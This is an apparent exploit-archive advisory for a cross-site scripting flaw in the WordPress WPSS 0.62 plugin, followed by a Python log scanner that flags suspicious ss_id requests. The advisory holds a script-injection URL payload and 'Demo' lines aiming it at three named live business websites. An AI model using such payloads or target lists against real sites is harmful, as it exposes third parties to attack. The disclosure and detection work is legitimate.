WordPress WPSS plugin version 0.62 suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
573d18117c642a6f633f17a29834ae59e01c18f4fef919461a88f1e167dbd769
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: WordPress WPSS v 0.62 Plugin Cross site scripting
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : 2014-08-05
|
| [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
|
| [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
|
| [*] Version : 0.62
|
| [*] Tested on: Windows, Mozilla Firefox
|-------------------------------------------------------------------------|
| [*] PoC :
|
| [*]
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
|
|-------------------------------------------------------------------------|
| [*] Demo:
|
| [*]
http://www.tahoebusinesses.com//wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
|
| [*]
http://www.forzabykemp.com/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
|
| [*]
http://calgarysalesteam.com/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
|
|-------------------------------------------------------------------------|
| [*]Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
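
A defender-side check for the request pattern in the PoC above, as an added example that is not part of the original advisory: it scans web server access-log lines for requests to ss_handler.php whose ss_id does not look like a plain identifier. The combined log format, the identifier pattern and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

HANDLER = "/wp-content/plugins/wpss/ss_handler.php"  # path from the advisory, lowercased
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,32}")  # assumption: shape of a legitimate ss_id
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # combined log format

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is inspected in the clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_ss_id(log_line):
    """Return the decoded ss_id when a request to the handler carries an unsafe value."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    path, _, query = match.group(1).partition("?")
    # Collapse repeated slashes so //wp-content/... is matched as well.
    path = re.sub(r"/+", "/", fully_decode(path)).lower()
    if not path.endswith(HANDLER):
        return None
    for raw in parse_qs(query, keep_blank_values=True).get("ss_id", []):
        value = fully_decode(raw)
        if not SAFE_ID.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_ss_id(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation IP ranges), not taken from any real site.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Aug/2014:10:00:01 +0000] "GET /wp-content/plugins/wpSS/ss_handler.php?ss_id=12 HTTP/1.1" 200 512',
    '198.51.100.7 - - [05/Aug/2014:10:00:09 +0000] "GET //wp-content/plugins/wpSS/ss_handler.php?ss_id=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E HTTP/1.1" 200 540',
    '198.51.100.7 - - [05/Aug/2014:10:00:15 +0000] "GET /wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=%2522%252F%253E HTTP/1.1" 200 530',
    '192.0.2.44 - - [05/Aug/2014:10:01:30 +0000] "GET /index.php?ss_id=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: unsafe ss_id {value!r}")
```

Tighten SAFE_ID to the identifier format the site actually uses; a hit means the request reached the handler with markup-capable input, not that the response reflected it.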